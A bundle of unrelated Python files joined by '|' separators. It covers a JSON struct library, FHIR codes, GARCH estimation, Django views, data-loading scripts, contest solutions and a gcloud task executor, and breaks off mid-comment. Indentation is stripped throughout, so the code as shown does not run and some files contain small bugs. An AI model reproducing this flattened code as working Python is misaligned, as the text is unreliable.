import sys
__import__('json', level=0)
json = sys.modules['json']
if hasattr(json, 'dumps'):
dumps = json.dumps
loads = json.loads
else:
# python2.5-json
dumps = getattr(json, 'write')
loads = getattr(json, 'read')
#===============================================================================
# Inherited stuff (defined here now to eliminate dependencies)
#===============================================================================
class dbdict(dict):
"""use dbdict from skytools instead for maximum compatibility"""
def __getattr__(self, k):
return self[k]
def __setattr__(self, k, v):
self[k] = v
def __delattr__(self, k):
del self[k]
#===============================================================================
# Magic that makes everything work
#===============================================================================
class _MetaStruct(type):
"""Builds struct classes with field initialization and type conversion
based on descriptions (Struct and its subclasses)
"""
def __new__(cls, name, bases, attrs):
_fields = {}
_attrs = {}
for attrname, attr in attrs.items():
if isinstance(attr, Field):
_fields[attrname] = attr
#elif not attrname.startswith('__'):
# _fields[attrname] = Field(attr)
else:
_attrs[attrname] = attr
def __setitem__(self, k, v):
if k in _fields:
v = _fields[k](k, v)
dbdict.__setitem__(self, k, v)
def __init__(self, *p, **kw):
for base in bases:
base.__init__(self, *p, **kw)
for fieldname, field in _fields.iteritems():
# if fieldname is not given to init then use default
# when default is not set, use ancestor's default
if fieldname not in kw and field.default:
val = field(fieldname)
else:
val = field(fieldname, self.get(fieldname))
self[fieldname] = val
for key, val in self.iteritems():
if not key in _fields:
if type(val) == dict:
self[key] = Struct(val)
elif type(val) == list:
self[key] = list_of(Struct)(val)
def validate(self):
for base in bases:
err = base.validate(self)
if err:
return err
for k in _fields.keys():
if k not in self:
return 'field %s missing in json' % k
_attrs.update({'__init__': __init__, '__setitem__':__setitem__})
return super(_MetaStruct, cls).__new__(cls, name, bases, _attrs)
def __init__(self, name, bases, attrs):
super(_MetaStruct, self).__init__(name, bases, attrs)
def __add__(self, other):
return type('CombinedStruct', (self, other), {})
#===============================================================================
# Building blocks
#===============================================================================
class Field(object):
"""Struct field definition"""
def __init__(self, type = None, default = None):
self.type = type
self.default = default
def __call__(self, name, value = None):
_value = value
_default = self.default
if _value is None:
if _default is None:
raise Exception('Field "%s" not set' % name)
if callable(_default):
_default = _default()
_value = _default
if self.type is not None and type(_value) != self.type:
_args = [_value] if _value else []
_value = self.type(*_args)
return _value
class Struct(dbdict):
"""Base class. All structure components must inherit or
instantiate Struct. Magic happens in metaclass.
"""
__metaclass__ = _MetaStruct
@classmethod
def from_json(cls, jsonstr):
"""creates object from json string"""
return cls(loads(jsonstr))
def dump_json(self):
"""dumps object to json string"""
return dumps(self)
def getas(self, name, cast = None, default = None):
"""get value by name with optional casting and default"""
value = self.get(name, default)
if cast:
value = cast(value)
return value
#===============================================================================
# Helpers and builders
#===============================================================================
def list_of(itemtype):
"""typed list handler builder"""
class ListHandler(list):
def __init__(self, *p):
list.__init__(self, *p)
for i, item in enumerate(self):
if not isinstance(item, itemtype):
self[i] = itemtype(item)
def new(self, *p, **kw):
item = itemtype(*p, **kw)
self.append(item)
return item
return ListHandler
def build_struct(*p, **kw):
"""Struct subclass building helper"""
return type('BuildStruct',
p or (Struct,),
dict((k, v if isinstance(v, Field) else Field(v))
for k,v in kw.iteritems()))
#===============================================================================
# DEMO
#===============================================================================
def func_call_example():
"""Funcion call is simulated, using argument defining, json string creation
and result processing
"""
class Context(Struct):
username = Field(str, default = lambda: 'egon')
class AbstractCall(Struct):
func = Field(str)
context = Field(Context)
class AbstractResult(Struct):
code = Field(int, default = 200)
msg = Field(str, default = 'OK')
# testcall with json as arg and result
def func_call(json_arg):
call = AbstractCall.from_json(json_arg)
assert call.func == 'public.test'
assert call.context.username == 'egon'
assert call.params.hostname == 'dub-db1'
Row = build_struct(id = Field(int), value = Field(str))
Result = build_struct(AbstractResult,
rows = Field(list_of(Row)),
created = Field(str, default = lambda: __import__('datetime').datetime.now()))
result = Result()
result.rows.new(id = 1, value = 'a')
row = result.rows.new()
row.id = 2
row.value = 'b'
row = result.rows.new(id = 3)
row.value = 'c'
result.rows.new({'id':4, 'value':'d'})
return result.dump_json()
# define concrete func call
Params = build_struct(hostname = Field(str), ip = Field(str))
Call = build_struct(AbstractCall, params = Field(Params))
call = Call()
call.func = 'public.test'
call.params.hostname = 'dub-db1'
call.params.ip ='192.168.1.1'
# create json, call and parse result json
json_call_str = call.dump_json()
print json_call_str
json_result_str = func_call(json_call_str)
print json_result_str
result = AbstractResult.from_json(json_result_str)
assert result.code == 200
assert result.msg == 'OK'
assert len(result.rows) == 4
assert result.rows[0].id == 1
if __name__ == '__main__':
import doctest
doctest.testmod()
func_call_example()
|
from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class AdjudicationErrorCodesCode(GenericTypeCode):
"""
Adjudication Error Codes
From: http://terminology.hl7.org/CodeSystem/adjudication-error in valuesets.xml
This value set includes a smattering of adjudication codes.
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/CodeSystem/adjudication-error
"""
codeset: FhirUri = "http://terminology.hl7.org/CodeSystem/adjudication-error"
class AdjudicationErrorCodesCodeValues:
"""
Missing Identifier
From: http://terminology.hl7.org/CodeSystem/adjudication-error in valuesets.xml
"""
MissingIdentifier = AdjudicationErrorCodesCode("a001")
"""
Missing Creation Date
From: http://terminology.hl7.org/CodeSystem/adjudication-error in valuesets.xml
"""
MissingCreationDate = AdjudicationErrorCodesCode("a002")
|
"""
Name : c15_16_GJR_GARCH_funciton.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : Yuxing Yan
Date : 6/6/2017
email : yany@canisius.edu
paulyxy@hotmail.com
"""
def GJR_GARCH(ret):
import numpy as np
import scipy.optimize as op
startV=np.array([ret.mean(),ret.var()*0.01,0.03,0.09,0.90])
finfo=np.finfo(np.float64)
t=(0.0,1.0)
bounds=[(-10*ret.mean(),10*ret.mean()),(finfo.eps,2*ret.var()),t,t,t]
T=np.size(ret,0)
sigma2=np.repeat(ret.var(),T)
inV=(ret,sigma2)
return op.fmin_slsqp(gjr_garch_likelihood,startV,f_ieqcons=gjr_constraint,bounds=bounds,args=inV)
#
import numpy as np
import matplotlib.pyplot as plt
from numpy import size, log, pi, sum, diff, array, zeros, diag, dot, mat, asarray, sqrt
from numpy.linalg import inv
from scipy.optimize import fmin_slsqp
from matplotlib.mlab import csv2rec
def gjr_garch_likelihood(parameters, data, sigma2, out=None):
mu = parameters[0]
omega = parameters[1]
alpha = parameters[2]
gamma = parameters[3]
beta = parameters[4]
T = size(data,0)
eps = data-mu
for t in xrange(1,T):
sigma2[t]=(omega+alpha*eps[t-1]**2+gamma*eps[t-1]**2*(eps[t- 1]<0)+beta*sigma2[t-1])
logliks = 0.5*(log(2*pi) + log(sigma2) + eps**2/sigma2)
loglik = sum(logliks)
if out is None:
return loglik
else:
return loglik, logliks, copy(sigma2)
def gjr_constraint(parameters,data, sigma2, out=None):
alpha = parameters[2]
gamma = parameters[3]
beta = parameters[4]
return array([1-alpha-gamma/2-beta]) # Constraint alpha+gamma/2+beta<=1
def hessian_2sided(fun, theta, args):
f = fun(theta, *args)
h = 1e-5*np.abs(theta)
thetah = theta + h
h = thetah-theta
K = size(theta,0)
h = np.diag(h)
fp = zeros(K)
fm = zeros(K)
for i in xrange(K):
fp[i] = fun(theta+h[i], *args)
fm[i] = fun(theta-h[i], *args)
fpp = zeros((K,K))
fmm = zeros((K,K))
for i in xrange(K):
for j in xrange(i,K):
fpp[i,j] = fun(theta + h[i] + h[j], *args)
fpp[j,i] = fpp[i,j]
fmm[i,j] = fun(theta-h[i]-h[j], *args)
fmm[j,i] = fmm[i,j]
hh = (diag(h))
hh = hh.reshape((K,1))
hh = dot(hh,hh.T)
H = zeros((K,K))
for i in xrange(K):
for j in xrange(i,K):
H[i,j] = (fpp[i,j]-fp[i]-fp[j] + f+ f-fm[i]-fm[j] + fmm[i,j])/hh[i,j]/2
H[j,i] = H[i,j]
return H
|
# -*- coding: utf-8 -*-
import base64
import pytest
from splash.har.utils import get_response_body_bytes
def get_har_response(text, encoding):
har_response = {
"status": 200,
"statusText": "OK",
"httpVersion": "HTTP/1.1",
"cookies": [],
"headers": [],
"content": {
"size": len(text),
"compression": 0,
"mimeType": "text/html; charset=utf-8",
"text": text,
},
"redirectURL": "",
"headersSize" : -1,
"bodySize" : -1,
}
if encoding is not None:
har_response['content']['encoding'] = encoding
return har_response
@pytest.mark.parametrize(["text", "encoding", "result"], [
["hello", None, b'hello'],
[
base64.b64encode(u"привет".encode('cp1251')).decode('ascii'),
'base64',
u"привет".encode('cp1251')
],
["", None, b""],
["", 'base64', b""],
[u"привет", None, u"привет".encode('utf8')],
[u"привет", 'binary', u"привет".encode('utf8')],
[u"привет".encode('utf8'), 'binary', u"привет".encode('utf8')],
])
def test_get_body_bytes(text, encoding, result):
har_response = get_har_response(text, encoding)
assert get_response_body_bytes(har_response) == result
def test_body_bytes_bad_encoding():
har_response = get_har_response("hello", "i-am-unknown")
with pytest.raises(ValueError):
get_response_body_bytes(har_response)
|
import os
import logging
import json
def readMetadataFolderForImgConvert(folder, pos_subfolder):
logging.debug('readMetadataFolder(): %s, %s' % (folder, pos_subfolder))
path = os.path.join(folder, pos_subfolder, 'metadata.txt')
if not os.path.exists(path):
logging.info('readMetadataFolder(): metadata.txt not found: %s' % (path))
return None
import sys
sys.stdout.write('.')
# Read coord from metadata.txt
with open(path) as f:
try:
obj = json.load(f)
fr_keys = obj.keys()
set_uuid = obj['Summary']['UUID']
for fr in fr_keys:
if fr == 'Summary':
continue
chname = obj[fr]['Channel']
objf = obj[fr]
frame = objf['FrameIndex']
slice = objf['SliceIndex']
uuid = objf.get('UUID') or (set_uuid+'_'+fr)
imgpath = os.path.join(folder, pos_subfolder, 'img_%09d_%s_%03d.tif' % (frame, chname, slice))
convert_multiple(set_uuid, uuid, imgpath, quality=['s1'])
except Exception as e:
logging.error(e)
def convert(imgpath,outpath,method='scipy', size=0.25):
if method == 'ImageMagick':
import subprocess
subprocess.call(['convert', '-quiet', '-contrast-stretch', '0.15x0.02%', '-resize', '%d%%' % (size*100), imgpath, outpath])
elif method == 'scipy':
import tifffile
import scipy.misc,scipy.ndimage
img = tifffile.imread(imgpath)
img2 = scipy.ndimage.zoom(img,size)
scipy.misc.imsave(outpath, img2)
def convert_multiple(set_uuid, img_uuid, imgpath, quality = ['half', 's1'], overwrite=False):
outfolder = os.path.join('..', 'images', set_uuid)
if not os.path.exists(outfolder):
os.makedirs(outfolder)
outpath_base = os.path.join(outfolder,img_uuid)
outpath = outpath_base + '.png'
if 'half' in quality and (overwrite or not os.path.exists(outpath)):
convert(imgpath,outpath,method='scipy',size=0.5)
outpath = outpath_base + '_s1.jpg'
if 's1' in quality and (overwrite or not os.path.exists(outpath)):
convert(imgpath,outpath,method='scipy',size=0.125)
import os, fnmatch
# http://stackoverflow.com/questions/6987123/search-in-wildcard-folders-recursively-in-python
def locate(pattern, root_path):
for path, dirs, files in os.walk(os.path.abspath(root_path)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
def batch_convert():
import test_config
import multiprocessing
from joblib import Parallel, delayed
# logging.basicConfig(level=logging.DEBUG)
fs = []
for f in locate('metadata.txt',test_config.batch_root):
subfolder = f.replace('metadata.txt','')
folder = os.path.join(subfolder,'..')
fs.append((folder,subfolder))
print('%d metadata files.' % (len(f)))
num_cores = multiprocessing.cpu_count()
Parallel(n_jobs=num_cores)(delayed(readMetadataFolderForImgConvert)(folder, subfolder) for folder,subfolder
in fs)
if __name__ == "__main__":
batch_convert() |
class Solution(object):
def longestPalindromeSubseq(self, s):
"""
:type s: str
:rtype: int
"""
if len(s) <= 1:
return len(s)
lpn = [[0] * len(s) for i in range(len(s))]
for i in range(len(s) - 1, -1, -1):
for j in range(i, len(s)):
if i == j:
lpn[i][j] = 1
else:
last_p = s.rfind(s[i], i + 1, j + 1)
if last_p == -1:
lpn[i][j] = lpn[i + 1][j]
else:
lpn[i][j] = max(2 + lpn[i + 1][last_p - 1], lpn[i + 1][j])
return lpn[0][len(s) - 1]
def longestPalindromeSubseq01(self, s):
"""
:type s: str
:rtype: int
"""
if len(s) <= 1:
return len(s)
lpn = [[-1] * len(s) for i in range(len(s))]
return self.db_up_to_bottom(s, 0, len(s) - 1, lpn)
def longestPalindrome02(self, s):
"""
:type s: str
:rtype: str
"""
r = [[True] * len(s) for i in range(len(s))]
start = 0
length = 0
if len(s) <= 1:
return s
for i in range(len(s) - 1, -1, -1):
for j in range(i + 1, len(s)):
if i + 1 == j:
r[i][j] = (s[i] == s[j])
elif s[i] == s[j]:
r[i][j] = r[i + 1][j - 1]
else:
r[i][j] = False
if r[i][j] and j - i + 1 > length:
length = j - i + 1
start = i
return s[start: start + length]
def db_up_to_bottom(self, s, i, j, lpn):
if lpn[i][j] != -1:
return lpn[i][j]
if i > j or len(s) <= 0:
return 0
if i == j:
lpn[i][j] = 1
return lpn[i][j]
last_p = s.rfind(s[i], i + 1, j + 1)
if last_p == -1:
lpn[i][j] = self.db_up_to_bottom(s, i+1, j, lpn)
else:
lpn[i][j] = max(2 + self.db_up_to_bottom(s, i+1, last_p - 1, lpn),
self.db_up_to_bottom(s, i + 1, j, lpn))
return lpn[i][j] |
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Parses the cities1000.txt geonames database and uses google maps
API to lookup locality, administrative_area_level_1 and country using
the latitude and longitude listed with each city.
Datafile sourced from: http://download.geonames.org/.
The contents of each lookup are written to a JSON-encoded file which
is re-read on each invocation. Only cities in cities1000.txt which are
not already accounted-for in the JSON-encoded file are looked up to
avoid duplicative queries.
Usage:
% python resources/geonames/geolookup.py --cityfile=cities1000.txt --lookupdb=lookup.json
"""
__author__ = 'spencer@emailscrubbed.com (Spencer Kimball)'
import json
import logging
import os
import sys
import time
from functools import partial
from operator import attrgetter
from tornado import httpclient, ioloop, options
from viewfinder.backend.base import util
from viewfinder.resources.geodata.geoprocessor import GeoProcessor
options.define('lookupdb', default='lookup.json', help='JSON output file containing lookup data')
options.define('query_rate', default=10, help='allowed queries per second to google maps')
class GeoLookup(object):
"""Main class for geolookup. Handles initial parse of JSON data
file and spawns async HTTP queries to google maps API.
"""
def __init__(self, io_loop, geoproc):
self._io_loop = io_loop
self._geoproc = geoproc
self._http_client = httpclient.AsyncHTTPClient()
try:
with open(options.options.lookupdb, 'r') as rf:
self._lookup_db = json.load(rf)
except:
self._lookup_db = {}
def RefreshDB(self, callback):
"""Refreshes the lookup database by iterating over all cities in
the geoprocessor and querying google maps for address components
for any that are missing.
"""
def _OnLookup(city, barrier_cb, response):
if response.code != 200:
logging.error('error in google maps API query: %s' % response)
else:
try:
json_response = json.loads(response.body)
components = []
if len(json_response['results']) > 0:
for comp in json_response['results'][0]['address_components']:
for t in comp['types']:
if t in ('locality', 'administrative_area_level_1', 'country'):
components.append(comp)
break
self._lookup_db[city.id] = components
except:
logging.exception('unable to parse google maps API response: %s' % response.body)
barrier_cb()
with util.Barrier(callback) as b:
def _ProcessCities(cities):
start_time = time.time()
lookup_count = 0
for index in xrange(len(cities)):
city = cities[index]
if city.id not in self._lookup_db:
lat, lon = float(city.lat), float(city.lon)
logging.info('looking up %s (%f, %f) via google maps API' % (city.name, lat, lon))
if lookup_count / (1.0 + time.time() - start_time) > options.options.query_rate:
logging.info('pausing to slow API query rate')
return self._io_loop.add_timeout(time.time() + 1.0, partial(_ProcessCities, cities[index:]))
lookup_count += 1
self._http_client.fetch('http://maps.googleapis.com/maps/api/geocode/json?latlng=%f,%f&sensor=false' %
(lat, lon), callback=partial(_OnLookup, city, b.Callback()), method='GET')
cities = self._geoproc.GetCities()
_ProcessCities(cities)
def SaveDB(self):
"""Saves the database to disk by writing to a temporary file and
then renames.
"""
tmp_file = options.options.lookupdb + '.bak'
try:
with open(tmp_file, 'w') as wf:
json.dump(self._lookup_db, wf)
os.rename(tmp_file, options.options.lookupdb)
except:
logging.exception('unable to write lookup database')
os.unlink(tmp_file)
def main():
io_loop = ioloop.IOLoop.instance()
options.parse_command_line()
geoproc = GeoProcessor()
geolookup = GeoLookup(io_loop, geoproc)
def _OnRefresh():
geolookup.SaveDB()
io_loop.stop()
geolookup.RefreshDB(_OnRefresh)
io_loop.start()
return 0
if __name__ == '__main__':
sys.exit(main())
|
from sys import stdin
from collections import deque
def main():
n = int(stdin.readline().strip())
gval_line = [0 for i in range(n)]
gval = [gval_line[:] for i in range(n)]
grid = []
queue = deque([])
for i in range(n):
grid.append(input().strip())
coords = [int(i) for i in input().strip().split(' ')]
initial = (coords[0], coords[1])
final = (coords[2], coords[3])
queue.append(initial)
while len(queue)!=0:
curr = queue.popleft()
y, x = curr
if curr==final:
print(str(gval[y][x]))
break
cval = gval[y][x]+1
for i in range(y+1, n):
if grid[i][x] == 'X':
break
elif gval[i][x] == 0:
gval[i][x] = cval
queue.append((i, x))
for i in range(y-1, -1, -1):
if grid[i][x] == 'X':
break
elif gval[i][x] == 0:
gval[i][x] = cval
queue.append((i, x))
for i in range(x+1, n):
if grid[y][i] == 'X':
break
elif gval[y][i] == 0:
gval[y][i] = cval
queue.append((y, i))
for i in range(x-1, -1, -1):
if grid[y][i] == 'X':
break
elif gval[y][i] == 0:
gval[y][i] = cval
queue.append((y, i))
main()
|
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from tests import unittest, random_chars
import botocore.session
class TestCognitoIdentity(unittest.TestCase):
def setUp(self):
self.session = botocore.session.get_session()
self.client = self.session.create_client('cognito-identity', 'us-east-1')
def test_can_create_and_delete_identity_pool(self):
pool_name = 'test%s' % random_chars(10)
response = self.client.create_identity_pool(
IdentityPoolName=pool_name, AllowUnauthenticatedIdentities=True)
self.client.delete_identity_pool(IdentityPoolId=response['IdentityPoolId'])
if __name__ == '__main__':
unittest.main()
|
from django.shortcuts import render
from django.http import HttpResponse
from .models import Image, ImageCategory, ImageLocation
from django.core.exceptions import ObjectDoesNotExist
# Create your views here.
def index(request):
images = Image.objects.all()
categories = ImageCategory.objects.all()
locations = ImageLocation.objects.all()
return render(request, 'index.html', {"images": images, "categories": categories, "locations": locations})
def search_results(request):
if 'category' in request.GET and request.GET["category"]:
search_term = request.GET.get("category")
print(search_term)
try:
categories = ImageCategory.objects.get(name=search_term)
searched_images = Image.search_image(categories)
print(searched_images)
return render(request, 'search.html', {'images': searched_images})
except ObjectDoesNotExist:
message = "No images found"
categories = ImageCategory.objects.all()
return render(request, "search.html", {"message": message, "categories": categories})
else:
message = "You haven't searched for any term"
return render(request, 'search.html', {'message': message})
def view_image(request, image_id):
try:
image = Image.objects.get(id=image_id)
return render(request, 'image.html', {'image': image})
except ObjectDoesNotExist:
message = 'Sorry, we could not find what you are looking for'
return render(request, 'image.html', {'message': message})
def get_category(request, category_id):
category = ImageCategory.objects.get(id=category_id)
image = Image.search_image(category)
return render(request, 'search.html', {'images': image})
def get_location(request,location_id):
location = ImageLocation.objects.get(id=location_id)
image = Image.search_by_location(location)
return render(request, 'search.html', {'images': image})
|
# Generated by Django 3.1.2 on 2020-10-04 05:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hello', '0002_auto_20201004_0330'),
]
operations = [
migrations.CreateModel(
name='Dataset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sales', models.IntegerField(max_length=200)),
('label', models.IntegerField(max_length=200)),
('cost', models.IntegerField(max_length=200)),
('msrp', models.IntegerField(max_length=200)),
('month', models.IntegerField(max_length=200)),
('mon', models.IntegerField(max_length=200)),
('tues', models.IntegerField(max_length=200)),
('wed', models.IntegerField(max_length=200)),
('thurs', models.IntegerField(max_length=200)),
('fri', models.IntegerField(max_length=200)),
('sat', models.IntegerField(max_length=200)),
('sun', models.IntegerField(max_length=200)),
],
),
migrations.AddField(
model_name='greeting',
name='BarcodeNum',
field=models.IntegerField(default=1, max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='greeting',
name='SKUNum',
field=models.IntegerField(default=0, max_length=200),
preserve_default=False,
),
migrations.AddField(
model_name='greeting',
name='industry',
field=models.CharField(default=1, max_length=200),
preserve_default=False,
),
]
|
import sqlite3
import json
import os
import pandas as pd
import re
conn = sqlite3.connect('happiness.db')
c = conn.cursor()
#Create Countries table
c.execute("""CREATE TABLE countries (id INTEGER PRIMARY KEY AUTOINCREMENT,country varchar, images_file text, image_url text, alpha2 text, alpha3 text,
country_code integer, iso_3166_2 text, region text, sub_region text, intermediate_region text, region_code integer,
sub_region_code integer, intermediate_region_code integer
)""")
#Read countries json file
myJsonFile = open('Data_Files\Data Files\countries_continents_codes_flags_url.json','r')
json_data = myJsonFile.read()
countries_json_obj = json.loads(json_data)
#Insert Data in Countries table
for country in countries_json_obj:
c.execute("insert into countries (country,images_file,image_url,alpha2,alpha3,country_code,iso_3166_2,region,sub_region,intermediate_region,region_code,sub_region_code,intermediate_region_code) values (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
[country['country'], country['images_file'], country['image_url'], country['alpha-2'], country['alpha-3'],
country['country-code'], country['iso_3166-2'], country['region'], country['sub-region'], country['intermediate-region'],
country['region-code'], country['sub-region-code'], country['intermediate-region-code']])
conn.commit()
#Read CSV files
csv_file_path = os.getcwd()+'\\Data_Files\\Data Files\\csv_files\\'
csv_files = []
for file in os.listdir(csv_file_path):
if(file.endswith('.csv')):
csv_files.append(file)
#Create DataFrame of csv files
df = {}
df_list = []
for file in csv_files:
df[file] = pd.read_csv(csv_file_path + file)
file_name_str = str(file)
report_year = re.findall('(\d{4})', file_name_str)
df[file].loc[:, 'year'] = str(report_year[0])
df[file].columns = [x.lower().replace(" ","_").replace("?","") \
.replace("-","_").replace("(","").replace(")","").replace("..","_").replace(".","_") \
for x in df[file].columns]
for x in df[file].columns:
col_name = str(x)
if col_name.endswith("_"):
c_col_name = col_name
col_name = col_name[:-1]
df[file].rename(columns = ({c_col_name: col_name}),inplace=True)
df[file].rename(columns=({"economy_gdp_per_capita": "gdp_per_capita"}), inplace=True)
df[file].rename(columns=({"score": "happiness_score"}), inplace=True)
df[file].rename(columns=({"freedom": "freedom_to_make_life_choices"}), inplace=True)
df[file].rename(columns=({"country_or_region": "country"}), inplace=True)
df[file].rename(columns=({"healthy_life_expectancy": "health_life_expectancy"}), inplace=True)
df_list.append(df[file])
result = pd.concat(df_list)
replacements = {
'object': 'varchar',
'float64': 'float',
'int64': 'int',
'datetime64': 'timestamp',
'timedelta64[ns]': 'varchar'
}
col_str = ", ".join("{} {}".format(n, d) for (n, d) in zip(result.columns, result.dtypes.replace(replacements)))
conn = sqlite3.connect('happiness.db')
c = conn.cursor()
#Create countries_happiness record table
c.execute("""CREATE TABLE countries_happiness (ID INTEGER PRIMARY KEY AUTOINCREMENT, %s);""" % (col_str))
conn.commit()
#Insert data from csv files to countries_happiness table
result.to_sql(name="countries_happiness", con=conn, if_exists='append', index=False)
#Question 3 - SQL Query to CSV
SQL_Query_Q3 = pd.read_sql_query('''select ch.year,c.country,c.image_url,c.region_code,c.region,ch.gdp_per_capita,ch.family,ch.social_support,ch.health_life_expectancy,ch.freedom_to_make_life_choices,ch.generosity,ch.perceptions_of_corruption from countries c inner join countries_happiness ch on c.country=ch.country''', conn)
df2 = pd.DataFrame(SQL_Query_Q3)
df2.to_csv (r'Exported_csv\exported_data_q3.csv', index = False)
conn.close() |
__copyright__ = "Copyright (c) 2020 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
# lift the chunk-level topk to doc-level topk
import numpy as np
from . import BaseExecutableDriver
from .helper import pb_obj2dict
if False:
from ..proto import jina_pb2
class BaseRankDriver(BaseExecutableDriver):
"""Drivers inherited from this Driver will bind :meth:`craft` by default """
def __init__(self, executor: str = None, method: str = 'score', *args, **kwargs):
super().__init__(executor, method, *args, **kwargs)
class Chunk2DocRankDriver(BaseRankDriver):
"""Extract chunk-level score and use the executor to compute the doc-level score
In multi-level document, this aggregates kth level score back to (k-1)th level. It is recursive until we hit level-0
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.recursion_order = 'post'
def _apply(self, doc: 'jina_pb2.Document', *args, **kwargs):
match_idx = []
query_chunk_meta = {}
match_chunk_meta = {}
for c in doc.chunks:
for k in c.matches:
match_idx.append((k.id, k.parent_id, c.id, k.score.value))
query_chunk_meta[c.id] = pb_obj2dict(c, self.exec.required_keys)
match_chunk_meta[k.id] = pb_obj2dict(k, self.exec.required_keys)
# np.uint32 uses 32 bits. np.float32 uses 23 bit mantissa, so integer greater than 2^23 will have their
# least significant bits truncated.
if match_idx:
match_idx = np.array(match_idx, dtype=np.float64)
doc_idx = self.exec_fn(match_idx, query_chunk_meta, match_chunk_meta)
for _d in doc_idx:
r = doc.matches.add()
r.id = int(_d[0])
r.level_depth = doc.level_depth # the match and doc are always on the same level_depth
r.score.ref_id = doc.id # label the score is computed against doc
r.score.value = _d[1]
r.score.op_name = exec.__class__.__name__
|
# BOJ 2887 행성 터널
import sys
sys.stdin = open('../input.txt', 'r')
si = sys.stdin.readline
def get_parent(parents, a):
if parents[a] == a:
return a
parents[a] = get_parent(parents, parents[a])
return parents[a]
def find_parent(parents, a, b):
return get_parent(parents, a) == get_parent(parents, b)
def union_parent(parents, a, b):
a = get_parent(parents, a)
b = get_parent(parents, b)
if a < b:
parents[b] = a
else:
parents[a] = b
def kruskal(edges):
edges.sort(key=lambda x: x[2])
edge = 0
tot = 0
parents = [i for i in range(n)]
for i in range(len(edges)):
a, b, c = edges[i]
if not find_parent(parents, a, b):
union_parent(parents, a, b)
tot += c
edge += 1
if edge == n - 1:
break
return tot
n = int(si())
arr = [list(map(int, si().split())) for _ in range(n)]
graph = []
for i in range(n):
arr[i].append(i)
s1 = sorted(arr, key=lambda x: x[0])
s2 = sorted(arr, key=lambda x: x[1])
s3 = sorted(arr, key=lambda x: x[2])
for i in range(1, n):
graph.append((s1[i - 1][3], s1[i][3], abs(s1[i - 1][0] - s1[i][0])))
graph.append((s2[i - 1][3], s2[i][3], abs(s2[i - 1][1] - s2[i][1])))
graph.append((s3[i - 1][3], s3[i][3], abs(s3[i - 1][2] - s3[i][2])))
print(kruskal(graph))
|
def walk(directions):
pass
def use(object):
pass
|
class GlobalSensitivity(object):
def __init__(self, value):
super().__init__()
self.value = value
@property
def value(self):
return self.__value
@value.setter
def value(self, value):
self.__value = value
|
from output.models.saxon_data.cta.cta0024_xsd.cta0024 import (
Doc,
Event,
When,
)
__all__ = [
"Doc",
"Event",
"When",
]
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Function for executing the tasks contained in a Task Iterator.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.storage import optimize_parameters_util
from googlecloudsdk.command_lib.storage import plurality_checkable_iterator
from googlecloudsdk.command_lib.storage.tasks import task_graph_executor
from googlecloudsdk.command_lib.storage.tasks import task_status
from googlecloudsdk.core import properties
def _execute_tasks_sequential(task_iterator,
received_messages=None,
task_status_queue=None):
"""Executes task objects sequentially.
Args:
task_iterator (Iterable[task.Task]): An iterator for task objects.
received_messages (Iterable[task.Message]): Messages sent to each
task in task_iterator.
task_status_queue (multiprocessing.Queue|None): Used by task to report it
progress to a central location.
Returns:
Iterable[task.Message] emitted by tasks in task_iterator.
"""
messages_from_current_task_iterator = []
for task in task_iterator:
if received_messages is not None:
task.received_messages = received_messages
task_output = task.execute(task_status_queue=task_status_queue)
if task_output is None:
continue
if task_output.messages is not None:
messages_from_current_task_iterator.extend(task_output.messages)
if task_output.additional_task_iterators is not None:
messages_for_dependent_tasks = []
for additional_task_iterator in task_output.additional_task_iterators:
messages_for_dependent_tasks = _execute_tasks_sequential(
additional_task_iterator,
messages_for_dependent_tasks,
task_status_queue=task_status_queue)
return messages_from_current_task_iterator
def should_use_parallelism():
"""Checks execution settings to determine if parallelism should be used.
This function is called in some tasks to determine how they are being
executed, and should include as many of the relevant conditions as possible.
Returns:
True if parallel execution should be used, False otherwise.
"""
process_count = properties.VALUES.storage.process_count.GetInt()
thread_count = properties.VALUES.storage.thread_count.GetInt()
return process_count > 1 or thread_count > 1
def execute_tasks(task_iterator,
parallelizable=False,
task_status_queue=None,
progress_type=None):
"""Call appropriate executor.
Args:
task_iterator: An iterator for task objects.
parallelizable (boolean): Should tasks be executed in parallel.
task_status_queue (multiprocessing.Queue|None): Used by task to report its
progress to a central location.
progress_type (task_status.ProgressType|None): Determines what type of
progress indicator to display.
Returns:
An integer indicating the exit_code. Zero indicates no fatal errors were
raised.
"""
plurality_checkable_task_iterator = (
plurality_checkable_iterator.PluralityCheckableIterator(task_iterator))
optimize_parameters_util.detect_and_set_best_config(
is_estimated_multi_file_workload=(
plurality_checkable_task_iterator.is_plural()))
# Some tasks operate under the assumption that they will only be executed when
# parallelizable is True, and use should_use_parallelism to determine how they
